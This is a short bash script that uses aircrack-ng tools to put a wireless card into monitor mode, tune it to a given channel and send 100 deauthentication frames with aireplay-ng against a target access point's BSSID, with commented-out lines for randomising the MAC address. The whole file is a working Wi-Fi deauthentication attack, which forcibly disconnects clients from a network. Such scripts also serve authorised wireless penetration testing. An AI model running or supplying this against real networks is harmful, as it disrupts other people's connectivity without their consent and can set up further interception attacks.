#!/bin/bash

BSSID=$1
channel=$2
deauth=$3

airmon-ng start wlan0
ifconfig wlan0mon down
iwconfig wlan0mon channel $channel
ifconfig wlan0mon up
xterm -e aireplay-ng -0 100 -a $BSSID wlan0mon
#macchanger -r wlan0mon | grep "New MAC"
#iwconfig wlan0mon mode monitor
#ifconfig wlan0mon up
airmon-ng stop wlan0mon

